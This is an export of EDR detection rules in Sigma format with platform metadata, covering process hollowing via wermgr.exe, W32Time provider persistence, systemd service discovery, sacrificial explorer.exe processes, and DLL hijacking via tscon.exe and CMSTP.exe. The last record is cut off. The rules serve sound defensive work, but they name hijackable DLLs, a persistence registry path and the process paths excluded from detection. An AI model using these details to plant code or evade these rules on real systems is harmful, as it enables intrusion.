"id": "f4f62a4f-220c-4330-95c3-4ffae6a2c3ec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070996Z",
"creation_date": "2026-03-23T11:45:34.070998Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071002Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/Kostastsale/status/1570178125400776705",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_suspicious_wermgr_execution_without_commandline_args.yml",
"content": "title: Suspicious wermgr.exe Execution\nid: f4f62a4f-220c-4330-95c3-4ffae6a2c3ec\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary wermgr.exe without command-line arguments.\n Note that the selection is a plain suffix match on the command line, so an invocation whose executable path is quoted (ending with a double quote) would likely not be matched.\n This technique has been used by QakBot in a September 2022 campaign in association with process hollowing.\n It is recommended to investigate the wermgr process as well as the process tree for suspicious activities.\nreferences:\n - https://twitter.com/Kostastsale/status/1570178125400776705\n - https://attack.mitre.org/techniques/T1055/\ndate: 2022/09/19\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.Qakbot\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\wermgr.exe'\n CommandLine|endswith:\n - '\\wermgr.exe'\n - '\\wermgr.exe '\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f4f62a4f-220c-4330-95c3-4ffae6a2c3ec",
"rule_name": "Suspicious wermgr.exe Execution",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary wermgr.exe without command-line arguments.\nNote that the selection is a plain suffix match on the command line, so an invocation whose executable path is quoted (ending with a double quote) would likely not be matched.\nThis technique has been used by QakBot in a September 2022 campaign in association with process hollowing.\nIt is recommended to investigate the wermgr process as well as the process tree for suspicious activities.\n",
"rule_creation_date": "2022-09-19",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5003b31-b196-4dc3-a7b0-b83b839ad76a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071440Z",
"creation_date": "2026-03-23T11:45:34.071442Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071446Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2019/10/22/persistence-time-providers/",
"https://attack.mitre.org/techniques/T1547/003/"
],
"name": "t1547_003_persistence_time_providers.yml",
"content": "title: Time Provider Installed\nid: f5003b31-b196-4dc3-a7b0-b83b839ad76a\ndescription: |\n Detects the installation of a new W32Time provider.\n The Windows Time service (W32Time) enables time synchronization across and within domains.\n Attackers may abuse time providers to execute DLLs when the system boots.\n It is recommended to analyze the process responsible for the registry edit as well as to analyze the DLL pointed to by the registry key to look for malicious content or actions.\nreferences:\n - https://pentestlab.blog/2019/10/22/persistence-time-providers/\n - https://attack.mitre.org/techniques/T1547/003/\ndate: 2020/09/22\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.003\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # Values seen in '*' :\n # - NtpClient --> %systemroot%\\system32\\w32time.dll\n # - NtpServer --> %systemroot%\\system32\\w32time.dll\n # - VMICTimeProvider --> %SystemRoot%\\System32\\vmictimeprovider.dll\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\\\*\\DllName'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_knowns:\n TargetObject:\n - HKLM\\SYSTEM\\CurrentControlSet\\services\\W32Time\\TimeProviders\\VMICTimeProvider\\DllName\n - HKLM\\SYSTEM\\CurrentControlSet\\services\\W32Time\\TimeProviders\\NtpClient\\DllName\n - HKLM\\SYSTEM\\CurrentControlSet\\services\\W32Time\\TimeProviders\\NtpServer\\DllName\n\n exclusion_trustedinstaller:\n Image: '?:\\windows\\servicing\\trustedinstaller.exe'\n\n exclusion_vmware:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\vmwTimeProvider\\DllName'\n Details: '?:\\Program Files\\VMware\\VMware 
Tools\\vmwTimeProvider\\vmwTimeProvider.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5003b31-b196-4dc3-a7b0-b83b839ad76a",
"rule_name": "Time Provider Installed",
"rule_description": "Detects the installation of a new W32Time provider.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\nAttackers may abuse time providers to execute DLLs when the system boots.\nIt is recommended to analyze the process responsible for the registry edit as well as to analyze the DLL pointed to by the registry key to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-22",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5024ded-8ae8-4b3c-ab52-8ce652afecd2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.757290Z",
"creation_date": "2026-03-23T11:45:35.294812Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294817Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1007/",
"https://attack.mitre.org/techniques/T1569/"
],
"name": "t1489_suspicious_systemd_services_discovered_via_cli.yml",
"content": "title: Suspicious SystemD Services Discovered via Command-line\nid: f5024ded-8ae8-4b3c-ab52-8ce652afecd2\ndescription: |\n Detects when the systemctl command-line utility is used to discover SystemD services.\n Adversaries may look for vulnerable services to exploit as part of their persistence or privilege escalation.\n It is recommended to check for other suspicious activities from the process' parent.\nreferences:\n - https://attack.mitre.org/techniques/T1007/\n - https://attack.mitre.org/techniques/T1569/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - attack.execution\n - attack.t1569\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/systemctl'\n CommandLine|contains: ' --type=service'\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n ProcessParentImage|endswith:\n - '/ash'\n - '/bash'\n - '/busybox'\n - '/dash'\n - '/fish'\n - '/sh'\n - '/tcsh'\n - '/zsh'\n - '/ksh'\n\n exclusion_service_start_stop:\n ParentCommandLine:\n - '/bin/sh /sbin/service * start'\n - '/bin/sh /sbin/service * stop'\n - '/bin/sh /sbin/service * reload'\n - '/bin/sh /usr/sbin/service * start'\n - '/bin/sh /usr/sbin/service * stop'\n - '/bin/sh /usr/sbin/service * reload'\n - '/bin/sh /etc/init.d/* start'\n - '/bin/sh /etc/init.d/* stop'\n\n exclusion_apt_helper:\n ParentImage: '/usr/lib/apt/apt-helper'\n\n exclusion_snapd:\n ParentImage:\n - '/usr/lib/snapd/snapd'\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n\n exclusion_invoke_rc:\n ParentCommandLine|contains: '/usr/sbin/invoke-rc.d'\n\n exclusion_puppet:\n - ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_fsecure:\n ParentImage: '/opt/f-secure/linuxsecurity/bin/statusd'\n\n exclusion_fusioninventory:\n - ParentCommandLine|contains: 
'fusioninventory-agent'\n - GrandparentCommandLine|contains: 'fusioninventory-agent'\n\n exclusion_cyberwatch:\n GrandparentCommandLine: 'python3 /usr/bin/cyberwatch-agent'\n\n exclusion_nagios:\n - ParentCommandLine|startswith:\n - '/bin/bash */nagios/check_service.sh'\n - '/bin/bash */nagios/libexec/check_etiam-nexus-services.sh'\n - GrandparentCommandLine: '/usr/sbin/nrpe -c /etc/nagios/nrpe.cfg -f'\n\n exclusion_xivo:\n GrandparentCommandLine|startswith:\n - '/bin/sh /usr/sbin/xivo-manage-slave-services'\n - '/bin/bash /usr/sbin/xivo-manage-slave-services'\n - '/bin/sh */bin/xivo-service'\n - '/bin/bash */bin/xivo-service'\n\n exclusion_monit:\n # TODO: Replace this with Ancestors when the feature is mature-enough\n GrandparentImage: '/opt/monit-*/bin/monit'\n\n exclusion_alfresco:\n ParentCommandLine|startswith: '/bin/bash /opt/alfresco/alfresco-content-monitored-startup.sh'\n\n exclusion_openitc:\n # php /opt/openitc/frontend/bin/cake.php cronjobs -q\n GrandparentCommandLine|startswith: 'php /opt/openitc/frontend/bin/cake.php'\n\n exclusion_mcafee:\n ParentCommandLine|startswith: '/bin/sh /opt/McAfee/agent/scripts/ma '\n\n exclusion_sendmail:\n ParentCommandLine: '/bin/sh /usr/share/sendmail/sendmail cron-msp'\n\n exclusion_checkpoint:\n ParentImage: '/var/lib/checkpoint/cpla/cpla'\n ParentCommandLine: '/usr/bin/cpla start'\n\n exclusion_dhclient:\n ParentCommandLine: '/bin/sh /sbin/dhclient-script'\n\n exclusion_netplan:\n ParentCommandLine|startswith: '/usr/bin/python3 /usr/sbin/netplan '\n\n exclusion_landscape:\n ParentCommandLine|startswith:\n - '/bin/bash /opt/canonical/landscape/'\n - '/bin/bash /etc/init.d/landscape-api'\n\n exclusion_needrestart:\n ParentCommandLine: '/usr/bin/perl /usr/sbin/needrestart'\n\n exclusion_oms:\n - ParentCommandLine|startswith:\n - '/bin/bash /opt/microsoft/omsconfig/'\n - '/opt/microsoft/omsagent/ruby/bin/ruby'\n - GrandparentCommandLine|startswith:\n - '/bin/bash /opt/microsoft/omsconfig/'\n - 
'/opt/microsoft/omsagent/ruby/bin/ruby'\n\n exclusion_pmlogger:\n CommandLine|contains: ' pmlogger.service'\n ParentCommandLine|startswith: '/bin/sh /usr/libexec/pcp/bin/pmlogger_daily'\n\n exclusion_newrelic:\n ParentImage: '/usr/bin/newrelic-infra'\n\n exclusion_pacemaker:\n CommandLine|startswith: '/usr/bin/python* /usr/sbin/pcs'\n\n exclusion_wazo:\n # CommandLine: systemctl is-active --quiet wazo-dird\n # ParentCommandLine: /bin/bash /bin/wazo-service start\n CommandLine|contains: ' wazo-'\n ParentCommandLine|startswith: '/bin/bash /bin/wazo-service '\n\n exclusion_wazuh:\n ParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_tanium_client:\n # /bin/bash /opt/Tanium/TaniumClient/VB/TempUnix_139697032525568_3197036490_.sh\n - ParentCommandLine|contains: '/opt/Tanium/TaniumClient/VB/TempUnix_'\n - GrandparentCommandLine|contains: '/opt/Tanium/TaniumClient/VB/TempUnix_'\n - ProcessParentCommandLine|contains: '/opt/Tanium/TaniumClient/VB/TempUnix_'\n - ProcessGrandparentCommandLine|contains: '/opt/Tanium/TaniumClient/VB/TempUnix_'\n\n exclusion_lynis:\n # /bin/sh /usr/bin/lynis audit system --cronjob\n # /bin/sh /usr/sbin/lynis audit system --cronjob\n - ParentCommandLine|startswith:\n - '/bin/sh ./lynis audit system '\n - '/bin/sh /usr/bin/lynis audit system '\n - '/bin/sh /usr/sbin/lynis audit system '\n - GrandparentCommandLine|startswith:\n - '/bin/sh ./lynis audit system '\n - '/bin/sh /usr/bin/lynis audit system '\n - '/bin/sh /usr/sbin/lynis audit system '\n\n exclusion_check_services:\n ParentCommandLine:\n - '/bin/bash ./check-services'\n - '/bin/bash /usr/bin/check-services'\n - '/bin/bash /usr/sbin/check-services'\n GrandparentCommandLine:\n - '/bin/bash ./check-services'\n - '/bin/bash /usr/bin/check-services'\n - '/bin/bash /usr/sbin/check-services'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c 
/usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_tanium:\n ProcessParentCommandLine|startswith: '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n ProcessGrandparentImage: '/opt/tanium/taniumclient/taniumclient'\n\n exclusion_paloalto:\n GrandparentCommandLine: '/opt/paloaltonetworks/globalprotect/PanGPS'\n\n exclusion_splunk:\n ProcessGrandparentCommandLine: '/bin/sh /opt/splunk/etc/apps/Splunk_TA_nix/bin/service.sh'\n\n exclusion_vagrant:\n ProcessGrandparentCommandLine|contains: 'vagrant'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5024ded-8ae8-4b3c-ab52-8ce652afecd2",
"rule_name": "Suspicious SystemD Services Discovered via Command-line",
"rule_description": "Detects when the systemctl command-line utility is used to discover SystemD services.\nAdversaries may look for vulnerable services to exploit as part of their persistence or privilege escalation.\nIt is recommended to check for other suspicious activities from the process' parent.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1007",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f51648fc-2289-43b4-8b39-c0e753db40cc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069534Z",
"creation_date": "2026-03-23T11:45:34.069536Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069541Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_sacrificial_explorer.yml",
"content": "title: Potential Sacrificial explorer.exe Spawned\nid: f51648fc-2289-43b4-8b39-c0e753db40cc\ndescription: |\n Detects a suspicious explorer.exe spawned from rundll32 without arguments that can be used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to check for malicious activities by the process and its parents.\nreferences:\n - https://attack.mitre.org/techniques/T1218/\ndate: 2021/02/18\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith:\n - '\\windows\\system32\\rundll32.exe'\n - '\\windows\\syswow64\\rundll32.exe'\n Image|endswith:\n - '\\windows\\explorer.exe'\n - '\\windows\\syswow64\\explorer.exe'\n CommandLine|endswith:\n - '\\explorer.exe'\n - '\\explorer.exe\"'\n\n exclusion_runas:\n # \"when a user choose to run a program as another user (right-click + shit), the process lineage will be a child of rundll32 with cmdline value like \"SHELL32.dll,RunAsNewUser_RunDLL Local\\{4ddb9f3f-700c-4bd6-9fc0-eaf85c01d25b}.\"\"\n # https://twitter.com/sbousseaden/status/1326652574150299649\n # C:\\windows\\system32\\RunDll32.exe C:\\windows\\system32\\SHELL32.dll,RunAsNewUser_RunDLL Local\\{4ddb9f3f-700c-4bd6-9fc0-eaf85c01d25b}.000081c8\n ParentCommandLine|contains|all:\n - 'RunAsNewUser_RunDLL'\n - '4ddb9f3f-700c-4bd6-9fc0-eaf85c01d25b'\n\n exclusion_shell32_explorer_restart:\n ParentCommandLine: '?:\\windows\\system32\\rundll32.exe shell32.dll,WaitForExplorerRestart ?:\\windows\\Explorer.EXE'\n\n # https://github.com/valinet/ExplorerPatcher/\n exclusion_explorer_patcher:\n ParentCommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe 
?:\\WINDOWS\\dxgi.dll,ZZGUI'\n - '?:\\windows\\system32\\rundll32.exe ?:\\Program Files\\ExplorerPatcher\\ep_gui.dll,ZZGUI'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files\\ExplorerPatcher\\ExplorerPatcher.amd64.dll,ZZGUI'\n\n exclusion_bluefiles:\n ParentCommandLine:\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc * BlueFilesSuite!BlueFilesSuite.CustomActions.RestartExplorerForce'\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc * BlueFilesSuite!BlueFilesSuite.CustomActions.RestartExplorer'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f51648fc-2289-43b4-8b39-c0e753db40cc",
"rule_name": "Potential Sacrificial explorer.exe Spawned",
"rule_description": "Detects a suspicious explorer.exe spawned from rundll32 without arguments that can be used as a sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to check for malicious activities by the process and its parents.\n",
"rule_creation_date": "2021-02-18",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5187b7a-1e48-4774-9102-ac47595f76e1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096859Z",
"creation_date": "2026-03-23T11:45:34.096861Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096866Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tscon.yml",
"content": "title: DLL Hijacking via tscon.exe\nid: f5187b7a-1e48-4774-9102-ac47595f76e1\ndescription: |\n Detects potential Windows DLL Hijacking via tscon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tscon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5187b7a-1e48-4774-9102-ac47595f76e1",
"rule_name": "DLL Hijacking via tscon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tscon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5691ac0-1613-4e00-860a-41f81c382d80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095865Z",
"creation_date": "2026-03-23T11:45:34.095867Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095884Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cmstp.yml",
"content": "title: DLL Hijacking via CMSTP.exe\nid: f5691ac0-1613-4e00-860a-41f81c382d80\ndescription: |\n Detects potential Windows DLL Hijacking via CMSTP.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CMSTP.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cmutil.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5691ac0-1613-4e00-860a-41f81c382d80",
"rule_name": "DLL Hijacking via CMSTP.exe",
